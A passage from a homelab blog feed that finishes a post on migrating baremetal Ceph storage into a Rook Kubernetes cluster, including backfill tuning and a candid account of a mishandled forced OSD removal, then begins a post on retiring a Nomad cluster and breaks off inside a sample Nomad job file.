</code></pre><p>Absolutely nothing interesting happened here; the whole operation took only about 49 minutes.
If you&rsquo;re interested in some metrics about a 1.7 TB copy operation from one
CephFS subvolume on one cluster to another subvolume on another cluster, have
a look at <a href="https://blog.mei-home.net/posts/ceph-copy-latency/">this recent post</a>.</p>
<h2 id="final-takedown-of-the-baremetal-cluster">Final takedown of the baremetal cluster</h2>
<p>So that&rsquo;s it. With the warehouse volume transferred, there was, supposedly, nothing
important on that cluster anymore.</p>
<p>But I wasn&rsquo;t about to trust that. Instead, I ran <code>ceph df</code> to confirm, and found
that there was exactly 348 MB of data left. Deciding that that can&rsquo;t be anything
important, I ran the cluster purge by executing this command on all the remaining
cluster hosts, meaning the two OSD nodes and the three cluster controllers hosting
the MONs:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>cephadm rm-cluster --force --zap-osds --fsid a84c7196-7ebf-11eb-b290-18c04d00217f
</span></span></code></pre></div><p>And just like that, the baremetal Ceph cluster was gone. It lived for almost
exactly four years, having been created on 2021-03-06, at 21:05.</p>
<h2 id="adding-the-two-baremetal-hosts-to-the-rook-cluster">Adding the two baremetal hosts to the Rook cluster</h2>
<p>After the old cluster had been removed, I needed to add the two OSD hosts to
the Rook cluster. I did so by first adding them to the k8s cluster and then
updating the Rook cluster&rsquo;s Helm values:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>      - <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;host1&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">devices</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;/dev/disk/by-id/wwn-0x5002538e90b5e22f&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">config</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">deviceClass</span>: <span style="color:#ae81ff">ssd</span>
</span></span><span style="display:flex;"><span>          - <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;/dev/disk/by-id/wwn-0x50014ee2ba48465d&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">config</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">deviceClass</span>: <span style="color:#ae81ff">hdd</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;host2&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">devices</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;/dev/disk/by-id/wwn-0x5002538e90b68866&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">config</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">deviceClass</span>: <span style="color:#ae81ff">ssd</span>
</span></span><span style="display:flex;"><span>          - <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;/dev/disk/by-id/wwn-0x50014ee20f9d1545&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">config</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">deviceClass</span>: <span style="color:#ae81ff">hdd</span>
</span></span></code></pre></div><p>Both hosts have one 1 TB SATA SSD and one 4 TB HDD. To be absolutely safe, I&rsquo;m
using the disks&rsquo; <a href="https://en.wikipedia.org/wiki/World_Wide_Name">WWNs</a> to identify
them.</p>
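<p>Finding the WWN for a given disk is straightforward, for example:</p>
<pre tabindex="0"><code># Show the World Wide Name for each block device
lsblk -o NAME,WWN,SIZE,MODEL
</code></pre>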
<p>After that, the rebalancing started:</p>
<p><figure>
    <img loading="lazy" src="pgs-host-addition.png"
         alt="A screenshot of a Grafana time series plot. It shows the state of the 265 Placement Groups in the cluster. At approximately 23:18, they go 130 PGs being remapped. Initially, the count of remapped PGs goes down relatively quickly, reaching only 67 remapped PGs around 01:02. But after that, the number of remapped PGs goes down only slowly, reaching zero around 19:44."/> <figcaption>
            <p>PG state during the rebalancing after adding the two additional hosts with four additional OSDs.</p>
        </figcaption>
</figure>

The initial, relatively rapid reduction in remapped PGs was probably the PGs on the
SSD OSDs, while the long tail was the PGs on the HDD OSDs.</p>
<p>I would love to show you the overall throughput of the backfill operations, but
it looks like there are no metrics for those. The <code>ceph_osd_op_r_out_bytes</code> and
<code>ceph_osd_op_w_in_bytes</code> metrics I&rsquo;m using for the general cluster throughput
seem to only count actual client operations. That throughput definitely did not show
the backfill load on the OSDs.</p>
<p>So let&rsquo;s instead have a look at the throughput of the six disks in the cluster:
<figure>
    <img loading="lazy" src="host-additions-writes.png"
         alt="A screenshot of a Grafana time series plot. At the beginning, it hovers somewhere around 10 MB/s, until it goes up to 30 MB/s around 23:19. The next jump comes at 23:49, to 70 MB/s. It goes down a bit again at 01:00, to around 40 MB/s. After that, the plot hovers anywhere between 30 MB/s and 50 MB/s until about 09:20, where it goes up to 70 MB/s for another 45 minutes or so, before coming down to 30 - 40 MB/s at 10 and stays there until 12:00. Then it goes up yet again to 50 MB/s. After 14:00, the plot slowly goes down towards the initial 10 MB/s range, which it reaches around 19:40."/> <figcaption>
            <p>Accumulated bytes written per second on all disks, HDD and SSD, in the Rook cluster during the rebalancing.</p>
        </figcaption>
</figure>

I just created that graph by adding up the written bytes per second from the
node exporter data I&rsquo;m gathering, specifically for the eight disks which are
part of the Rook cluster at this point.</p>
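<p>The query behind that graph is roughly this, with the instance and device regexes
standing in for my actual label values:</p>
<pre tabindex="0"><code>sum(rate(node_disk_written_bytes_total{instance=~&#34;ceph-host.*&#34;, device=~&#34;sd.&#34;}[5m]))
</code></pre>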
<p>The graph has a couple of points worth discussing. The first one to note is that
there was not much client load on the cluster overall; it hovered around
1 - 2 MB/s, typical for my Homelab. And still, the rebalancing only produced,
at maximum, 70 MB/s worth of writes. And remember, these are not just HDDs, but
also SSDs. I&rsquo;m pretty sure that this limit is entirely due to Ceph itself.
At the beginning of the plot, around 23:49, you can see a jump from around
30 MB/s to 70 MB/s. That happened after I entered the following two commands:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph config set osd osd_mclock_override_recovery_settings true
</span></span><span style="display:flex;"><span>ceph config set osd osd_max_backfills <span style="color:#ae81ff">2</span>
</span></span></code></pre></div><p>These instruct Ceph to use more than one backfill per OSD. Then you can also see
another jump at 09:20 the next morning, where the throughput suddenly goes from
around 40 MB/s to 70 MB/s again, at least for a short while. That was after
I entered this command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph config set osd osd_mclock_profile high_recovery_ops
</span></span></code></pre></div><p>I will refrain from any expletives at this point, because I don&rsquo;t understand this
well enough to judge whether I&rsquo;m the problem here, or whether Ceph really works
this way.</p>
<p>So, a little while ago, Ceph introduced a new IO scheduler, <a href="https://docs.ceph.com/en/reef/rados/configuration/mclock-config-ref/">mclock</a>.
The config settings I showed above impact how that scheduler works.</p>
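<p>To see what the scheduler is currently working with, the relevant options can
simply be queried:</p>
<pre tabindex="0"><code># Show the currently active mclock profile and backfill limit
ceph config get osd osd_mclock_profile
ceph config get osd osd_max_backfills
</code></pre>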
<p>Why do I have to make these settings at all? Why, with barely 1 - 2 MB/s of client
throughput, do I actually have to tell Ceph to run more than one backfill per OSD? And why doesn&rsquo;t
Ceph use the OSDs&rsquo; full throughput for even that one default backfill?
Because that graph above, that&rsquo;s not a single disk. That&rsquo;s the sum of the throughput
on all of them. This kind of write throughput would be pathetic for a single HDD.
I really don&rsquo;t understand why my mixed HDD/SSD cluster shows it.
What does the scheduler actually do here? I mean, don&rsquo;t get me wrong - there is
likely a good reason, but I don&rsquo;t understand it. Why not use an OSD&rsquo;s full write
capacity for backfills <em>when there is nearly no other traffic happening</em>?</p>
<p>I was really stumped when I saw these numbers. And also, why even have a scheduler
when I still need to manually set the maximum number of backfills allowed?</p>
<p>Anyway, there&rsquo;s now a &ldquo;Learn Ceph&rdquo; task in my backlog. When the migration is done,
I will not put my old home server back into storage. Instead, I will buy a couple
more disks and use it as a Ceph playground. And if I have to read the entire
Ceph source code from <code>int main()</code> to the end, I will. Because I&rsquo;m now intensely
curious about why the backfill was so darned slow.</p>
<p>And now, let&rsquo;s come to the &ldquo;Michael utterly embarrasses himself&rdquo; part of this post.</p>
<h2 id="arrogance">Arrogance</h2>
<p>After the addition of the new hosts was done, I could shut down the Ceph VM running
on my extension host, as it was no longer required.</p>
<p>And I learned that I have an unhealthy amount of arrogance. I went into this
thinking &ldquo;Well, I sure know how to remove a host from a Ceph cluster, I don&rsquo;t
need any docs!&rdquo;.</p>
<p><em>Narrator:</em> He did need docs.</p>
<p>So let&rsquo;s start with what I should have done. I should have followed
<a href="https://rook.io/docs/rook/latest-release/Storage-Configuration/Advanced/ceph-osd-mgmt/#host-based-cluster">these Rook docs</a>.
They describe, in very nice detail, what to do to remove OSDs from a Rook Ceph
cluster.</p>
<p>But no. That was of course not what I did. What I did was just winging it.
So I started by removing the host from the <code>values.yaml</code> file. That had only one
effect, namely showing messages like this in the logs of the Rook operator:</p>
<pre tabindex="0"><code>2025-03-15 19:20:15.090341 W | op-osd: not updating OSD 0 on node &#34;oldhost&#34;. node no longer exists in the storage spec. if the user wishes to remove OSDs from the node, they must do so manually. Rook will not remove OSDs from nodes that are removed from the storage spec in order to prevent accidental data loss
</code></pre><p>After that slightly embarrassing failure, I deigned to actually skim the doc I
linked to above, and found this command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>$ kubectl rook-ceph rook purge-osd 0,1 --force
</span></span><span style="display:flex;"><span>Info: Running purge osd command
</span></span><span style="display:flex;"><span>2025/03/15 19:48:59 maxprocs: Leaving GOMAXPROCS<span style="color:#f92672">=</span>8: CPU quota undefined
</span></span><span style="display:flex;"><span>2025-03-15 19:48:59.731856 W | cephcmd: loaded admin secret from env var ROOK_CEPH_SECRET instead of from file
</span></span><span style="display:flex;"><span>2025-03-15 19:48:59.731894 I | rookcmd: starting Rook v1.16.5 with arguments <span style="color:#e6db74">&#39;rook ceph osd remove --osd-ids=0,1 --force-osd-removal=true&#39;</span>
</span></span><span style="display:flex;"><span>2025-03-15 19:48:59.731897 I | rookcmd: flag values: --force-osd-removal<span style="color:#f92672">=</span>true, --help<span style="color:#f92672">=</span>false, --log-level<span style="color:#f92672">=</span>INFO, --osd-ids<span style="color:#f92672">=</span>0,1, --preserve-pvc<span style="color:#f92672">=</span>false
</span></span><span style="display:flex;"><span>2025-03-15 19:48:59.737462 I | cephclient: writing config file /var/lib/rook/rook-ceph/rook-ceph.config
</span></span><span style="display:flex;"><span>2025-03-15 19:48:59.737529 I | cephclient: generated admin config in /var/lib/rook/rook-ceph
</span></span><span style="display:flex;"><span>2025-03-15 19:48:59.921560 I | cephosd: validating status of osd.0
</span></span><span style="display:flex;"><span>2025-03-15 19:48:59.921571 I | cephosd: osd.0 is healthy. It cannot be removed unless it is <span style="color:#e6db74">&#39;down&#39;</span>
</span></span><span style="display:flex;"><span>2025-03-15 19:48:59.921573 I | cephosd: validating status of osd.1
</span></span><span style="display:flex;"><span>2025-03-15 19:48:59.921575 I | cephosd: osd.1 is healthy. It cannot be removed unless it is <span style="color:#e6db74">&#39;down&#39;</span>
</span></span></code></pre></div><p>So that wasn&rsquo;t exactly a success either. So what did I do? Did I now properly
read the entire page? No, of course not.
I instead decided that the right way to do this was to scale down the two OSDs
I wanted to remove:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl -n rook-cluster scale deployment rook-ceph-osd-0 --replicas<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span>
</span></span><span style="display:flex;"><span>kubectl -n rook-cluster scale deployment rook-ceph-osd-1 --replicas<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span>
</span></span></code></pre></div><p>And then I repeated the previous command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>$ kubectl rook-ceph rook purge-osd 0,1 --force
</span></span><span style="display:flex;"><span>Info: Running purge osd command
</span></span><span style="display:flex;"><span>2025/03/15 19:50:33 maxprocs: Leaving GOMAXPROCS<span style="color:#f92672">=</span>8: CPU quota undefined
</span></span><span style="display:flex;"><span>2025-03-15 19:50:33.244662 W | cephcmd: loaded admin secret from env var ROOK_CEPH_SECRET instead of from file
</span></span><span style="display:flex;"><span>2025-03-15 19:50:33.244700 I | rookcmd: starting Rook v1.16.5 with arguments <span style="color:#e6db74">&#39;rook ceph osd remove --osd-ids=0,1 --force-osd-removal=true&#39;</span>
</span></span><span style="display:flex;"><span>2025-03-15 19:50:33.244704 I | rookcmd: flag values: --force-osd-removal<span style="color:#f92672">=</span>true, --help<span style="color:#f92672">=</span>false, --log-level<span style="color:#f92672">=</span>INFO, --osd-ids<span style="color:#f92672">=</span>0,1, --preserve-pvc<span style="color:#f92672">=</span>false
</span></span><span style="display:flex;"><span>2025-03-15 19:50:33.250479 I | cephclient: writing config file /var/lib/rook/rook-ceph/rook-ceph.config
</span></span><span style="display:flex;"><span>2025-03-15 19:50:33.250539 I | cephclient: generated admin config in /var/lib/rook/rook-ceph
</span></span><span style="display:flex;"><span>2025-03-15 19:50:33.432040 I | cephosd: validating status of osd.0
</span></span><span style="display:flex;"><span>2025-03-15 19:50:33.432049 I | cephosd: osd.0 is marked <span style="color:#e6db74">&#39;DOWN&#39;</span>
</span></span><span style="display:flex;"><span>2025-03-15 19:50:33.622957 I | cephosd: marking osd.0 out
</span></span><span style="display:flex;"><span>2025-03-15 19:50:34.825971 I | cephosd: osd.0 is NOT ok to destroy but force removal is enabled so proceeding with removal
</span></span><span style="display:flex;"><span>2025-03-15 19:50:34.828262 E | cephosd: failed to fetch the deployment <span style="color:#e6db74">&#34;rook-ceph-osd-0&#34;</span>. deployments.apps <span style="color:#e6db74">&#34;rook-ceph-osd-0&#34;</span> not found
</span></span><span style="display:flex;"><span>2025-03-15 19:50:34.828271 I | cephosd: purging osd.0
</span></span><span style="display:flex;"><span>2025-03-15 19:50:35.055813 I | cephosd: attempting to remove host <span style="color:#e6db74">&#34;oldhost&#34;</span> from crush map <span style="color:#66d9ef">if</span> not in use
</span></span><span style="display:flex;"><span>2025-03-15 19:50:35.237143 I | cephosd: failed to remove CRUSH host <span style="color:#e6db74">&#34;oldhost&#34;</span>. exit status <span style="color:#ae81ff">39</span>
</span></span><span style="display:flex;"><span>2025-03-15 19:50:35.427664 I | cephosd: no ceph crash to silence
</span></span><span style="display:flex;"><span>2025-03-15 19:50:35.427677 I | cephosd: completed removal of OSD <span style="color:#ae81ff">0</span>
</span></span><span style="display:flex;"><span>2025-03-15 19:50:35.427680 I | cephosd: validating status of osd.1
</span></span><span style="display:flex;"><span>2025-03-15 19:50:35.427683 I | cephosd: osd.1 is marked <span style="color:#e6db74">&#39;DOWN&#39;</span>
</span></span><span style="display:flex;"><span>2025-03-15 19:50:35.608670 I | cephosd: marking osd.1 out
</span></span><span style="display:flex;"><span>2025-03-15 19:50:36.329162 I | cephosd: osd.1 is NOT ok to destroy but force removal is enabled so proceeding with removal
</span></span><span style="display:flex;"><span>2025-03-15 19:50:36.331913 E | cephosd: failed to fetch the deployment <span style="color:#e6db74">&#34;rook-ceph-osd-1&#34;</span>. deployments.apps <span style="color:#e6db74">&#34;rook-ceph-osd-1&#34;</span> not found
</span></span><span style="display:flex;"><span>2025-03-15 19:50:36.331920 I | cephosd: purging osd.1
</span></span><span style="display:flex;"><span>2025-03-15 19:50:36.655373 I | cephosd: attempting to remove host <span style="color:#e6db74">&#34;oldhost&#34;</span> from crush map <span style="color:#66d9ef">if</span> not in use
</span></span><span style="display:flex;"><span>2025-03-15 19:50:37.663211 I | cephosd: removed CRUSH host <span style="color:#e6db74">&#34;oldhost&#34;</span>
</span></span><span style="display:flex;"><span>2025-03-15 19:50:37.930419 I | cephosd: no ceph crash to silence
</span></span><span style="display:flex;"><span>2025-03-15 19:50:37.930431 I | cephosd: completed removal of OSD <span style="color:#ae81ff">1</span>
</span></span></code></pre></div><p>Note especially those lines:</p>
<pre tabindex="0"><code>2025-03-15 19:50:34.825971 I | cephosd: osd.0 is NOT ok to destroy but force removal is enabled so proceeding with removal
2025-03-15 19:50:36.329162 I | cephosd: osd.1 is NOT ok to destroy but force removal is enabled so proceeding with removal
</code></pre><p>That&rsquo;s where my arrogance really bit me. I had just copy+pasted the <code>rook purge-osd</code>
command from the docs, including the <code>--force</code> at the end. Not a good idea.
Instead of taking the OSDs out and then letting the cluster rebalance, the OSDs were
just removed, meaning I had a relatively long phase of reduced data redundancy.</p>
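<p>For the record, the way it should have gone, as far as I understand the docs, is
roughly this:</p>
<pre tabindex="0"><code># Mark the OSDs out first and let the cluster rebalance while they are still running
kubectl rook-ceph ceph osd out 0 1
# wait until all PGs are active+clean again, then stop the OSDs...
kubectl -n rook-cluster scale deployment rook-ceph-osd-0 rook-ceph-osd-1 --replicas=0
# ...and purge them, this time without --force
kubectl rook-ceph rook purge-osd 0,1
</code></pre>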
<p>Not my most stellar Homelab moment.</p>
<p>It took another 17 hours of rebalancing to recover the cluster. But I still wasn&rsquo;t
done yet, because now the Rook operator logs were showing these messages:</p>
<pre tabindex="0"><code>2025-03-20 20:31:32.598410 I | clusterdisruption-controller: osd &#34;rook-ceph-osd-0&#34; is down and a possible node drain is detected
2025-03-20 20:31:32.598473 I | clusterdisruption-controller: osd &#34;rook-ceph-osd-1&#34; is down and a possible node drain is detected
2025-03-20 20:31:32.814825 I | clusterdisruption-controller: osd is down in failure domain &#34;oldhost&#34;. pg health: &#34;all PGs in cluster are clean&#34;
</code></pre><p>And again, had I read the docs properly, this would not have happened. I fixed
the issue with the following commands:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl -n rook-ceph scale deployment rook-ceph-operator --replicas<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span>
</span></span><span style="display:flex;"><span>kubectl delete deployments.apps -n rook-cluster rook-ceph-osd-0
</span></span><span style="display:flex;"><span>kubectl delete deployments.apps -n rook-cluster rook-ceph-osd-1
</span></span><span style="display:flex;"><span>kubectl -n rook-ceph scale deployment rook-ceph-operator --replicas<span style="color:#f92672">=</span><span style="color:#ae81ff">1</span>
</span></span></code></pre></div><p>With that, I had finally removed the old host cleanly from the Rook cluster. It
could all have been a lot smoother if I&rsquo;d just read the docs properly the first
time. Again, no data loss of course, but it could have gone better.</p>
<p>The last step in the Ceph baremetal to Rook saga was to remove the old host from
the Kubernetes cluster entirely:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl drain oldhost --ignore-daemonsets --delete-local-data
</span></span><span style="display:flex;"><span>kubectl delete node oldhost
</span></span></code></pre></div><p>And then resetting the Ceph scheduler options:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl rook-ceph ceph config rm osd osd_mclock_profile
</span></span><span style="display:flex;"><span>kubectl rook-ceph ceph config rm osd osd_mclock_override_recovery_settings
</span></span></code></pre></div><h2 id="conclusion">Conclusion</h2>
<p>And that was it. The entire migration from baremetal Ceph took me quite a while,
but a lot of it was just waiting for copying and rebalancing operations to finish.
The effort I had to put in was relatively low. Even considering that somewhere
towards the end I temporarily forgot the value of reading documentation from
beginning to end.</p>
<p>The fact that I apparently did not make full use of my storage performance, especially
during the addition and removal of hosts, has reinforced my wish to do a real deep
dive into Ceph, how it&rsquo;s implemented and how it works. Luckily, it&rsquo;s written in
C++, which I also work with at my day job. But I&rsquo;m hoping I can also find
some more high-level explanations of the algorithms used. I even plan to read
Weil&rsquo;s original thesis and papers on RADOS and the CRUSH algorithm.</p>
<p>While writing these lines, I&rsquo;m also working on the last step of the migration,
migrating Vault into the cluster and then migrating the cluster control plane
nodes from VMs to my three Pi 4.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Nomad to k8s, Part 22: The end of Nomad</title>
      <link>https://blog.mei-home.net/posts/k8s-migration-22-end-of-nomad/</link>
      <pubDate>Sun, 23 Mar 2025 23:10:32 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/k8s-migration-22-end-of-nomad/</guid>
      <description>The end of a Workload Scheduler era</description>
      <content:encoded><![CDATA[<p>Wherein I shut down my Nomad cluster for good.</p>
<p>This is part 23 of my <a href="https://blog.mei-home.net/tags/k8s-migration/">k8s migration series</a>.</p>
<p>It is finally done: on the 13th of March I shut down my <a href="https://www.nomadproject.io/">Nomad</a> cluster. I had
originally set it up sometime around 2021. The original trigger was that I had
started to separate the Docker containers running public-facing services from the
purely internal ones. Around that setup, I had constructed a bunch of bash
scripts and a couple of shared mounts. It wasn&rsquo;t pretty, plus the Homelab had
recently turned from a utility into a genuine hobby. In short, increased complexity
was actually welcomed. &#x1f601;</p>
<p>So when I started reading about workload schedulers, I naturally first looked at Kubernetes.
I bounced off of that when I came to the &ldquo;Now choose a Container Networking Plugin&rdquo;
stage of the install instructions. And I didn&rsquo;t just not know which CNI plugin
to choose - no, I didn&rsquo;t even know <em>how to make said choice</em>.</p>
<p>And that&rsquo;s how I came across Nomad. Together with <a href="https://www.consul.io/">Consul</a>
and <a href="https://www.vaultproject.io/">Vault</a> I had a really enjoyable Homelab. Nomad,
as well as Consul and Vault, are absolutely excellent tools. Nomad has some really
great flexibility when it comes to the drivers it can use for its jobs. They
range from Docker to pure exec jobs run in a simple chroot. Networking can be
done as simple or complex as you like, and by default you don&rsquo;t need to worry
about any kind of separate network. If you like, you can run it all on the
network between your nodes without any complicated CNIs.</p>
<p>And that&rsquo;s what initially drew me to Nomad. Taken on its own, it doesn&rsquo;t do much more
than run workloads. For secrets management or service discovery
you can then add Vault and Consul, or you can just leave those things out.</p>
<p>Since I started with Nomad, some service discovery and secrets management
capabilities have been added to Nomad itself, but I never tried them because I already had Vault and
Consul set up to my liking.</p>
<p>So let&rsquo;s have a short look at an example job:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">job</span> <span style="color:#e6db74">&#34;prometheus&#34;</span> {
</span></span><span style="display:flex;"><span>  datacenters <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;homenet&#34;</span>]
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">constraint</span> {
</span></span><span style="display:flex;"><span>    attribute <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;${node.class}&#34;</span>
</span></span><span style="display:flex;"><span>    value     <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;internal&#34;</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">group</span> <span style="color:#e6db74">&#34;prometheus&#34;</span> {
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">network</span> {
</span></span><span style="display:flex;"><span>      mode <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;bridge&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">port</span> <span style="color:#e6db74">&#34;health&#34;</span> {
</span></span><span style="display:flex;"><span>        host_network <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;local&#34;</span>
</span></span><span style="display:flex;"><span>        to           <span style="color:#f92672">=</span> <span style="color:#ae81ff">9090</span>
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">service</span> {
</span></span><span style="display:flex;"><span>      name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;prometheus&#34;</span>
</span></span><span style="display:flex;"><span>      port <span style="color:#f92672">=</span> <span style="color:#ae81ff">9090</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">connect</span> {
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">sidecar_service</span> {
</span></span><span style="display:flex;"><span>          <span style="color:#66d9ef">proxy</span> {
</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">upstreams</span> {
</span></span><span style="display:flex;"><span>              destination_name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;snmp-exporter&#34;</span>
</span></span><span style="display:flex;"><span>              local_bind_port <span style="color:#f92672">=</span> <span style="color:#ae81ff">9116</span>
</span></span><span style="display:flex;"><span>            }
</span></span><span style="display:flex;"><span>          }
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">check</span> {
</span></span><span style="display:flex;"><span>        type     <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;http&#34;</span>
</span></span><span style="display:flex;"><span>        interval <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;30s&#34;</span>
</span></span><span style="display:flex;"><span>        path     <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/-/ready&#34;</span>
</span></span><span style="display:flex;"><span>        timeout  <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;2s&#34;</span>
</span></span><span style="display:flex;"><span>        port     <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;health&#34;</span>
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">volume</span> <span style="color:#e6db74">&#34;vol-prometheus&#34;</span> {
</span></span><span style="display:flex;"><span>      type            <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;csi&#34;</span>
</span></span><span style="display:flex;"><span>      source          <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;vol-prometheus&#34;</span>
</span></span><span style="display:flex;"><span>      attachment_mode <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;file-system&#34;</span>
</span></span><span style="display:flex;"><span>      access_mode     <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;single-node-writer&#34;</span>
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">task</span> <span style="color:#e6db74">&#34;prometheus&#34;</span> {
</span></span><span style="display:flex;"><span>      driver <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;docker&#34;</span>
</span></span><span style="display:flex;"><span>      user <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;962:962&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">config</span> {
</span></span><span style="display:flex;"><span>        image <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;prom/prometheus:v2.50.0&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">mount</span> {
</span></span><span style="display:flex;"><span>          type <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;bind&#34;</span>
</span></span><span style="display:flex;"><span>          source <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;secrets/prometheus.yml&#34;</span>
</span></span><span style="display:flex;"><span>          target <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/etc/prometheus/prometheus.yml&#34;</span>
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>        args <span style="color:#f92672">=</span> [
</span></span><span style="display:flex;"><span>          &#34;--config.file<span style="color:#f92672">=</span><span style="color:#960050;background-color:#1e0010">/</span><span style="color:#66d9ef">etc</span><span style="color:#960050;background-color:#1e0010">/</span><span style="color:#66d9ef">prometheus</span><span style="color:#960050;background-color:#1e0010">/</span><span style="color:#66d9ef">prometheus</span>.<span style="color:#66d9ef">yml</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>          &#34;--storage.tsdb.path<span style="color:#f92672">=</span><span style="color:#960050;background-color:#1e0010">/</span><span style="color:#66d9ef">prometheus</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>          &#34;--web.console.libraries<span style="color:#f92672">=</span><span style="color:#960050;background-color:#1e0010">/</span><span style="color:#66d9ef">usr</span><span style="color:#960050;background-color:#1e0010">/</span><span style="color:#66d9ef">share</span><span style="color:#960050;background-color:#1e0010">/</span><span style="color:#66d9ef">prometheus</span><span style="color:#960050;background-color:#1e0010">/</span><span style="color:#66d9ef">console_libraries</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
